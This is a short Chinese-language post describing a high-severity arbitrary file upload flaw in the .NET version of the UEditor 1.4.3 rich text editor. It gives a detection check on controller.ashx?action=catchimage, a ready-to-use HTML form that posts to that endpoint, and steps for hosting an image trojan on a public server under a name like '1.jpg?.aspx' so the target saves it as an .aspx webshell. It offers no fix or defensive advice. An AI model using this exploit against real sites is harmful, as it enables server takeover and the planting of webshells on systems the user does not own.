Ueditor1.4.3编辑器上传漏洞(高危、针对aspx可拿shell)

1、漏洞问题:
UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。

本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞

漏洞文件为“controller.ashx“
漏洞利用条件:IIS、一台公网服务器
访问漏懂关键字地址:"http://xxxxxxxxx/controller.ashx?action=catchimage"查询页面状态若存在“{“state”:“参数错误:没有指定抓取源”}“则证明存在该漏洞
自行构造上传页面,页面代码如下:
<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">  
<p>shell addr:<input type="text" name="source[]" /></p >  
<inputtype="submit" value="Submit" /></form>

只需修改action的url即可使用,由于该上传漏洞不能本地上传文件,只能利用远程文件上传,所以需要在公网服务器上布置好图片木马(例如1.jpg),且需要上传地址将木马文件名修改成“1.jpg?.aspx”样式,填写远程服务器木马地址上传后即可得到名为1.aspx的webshell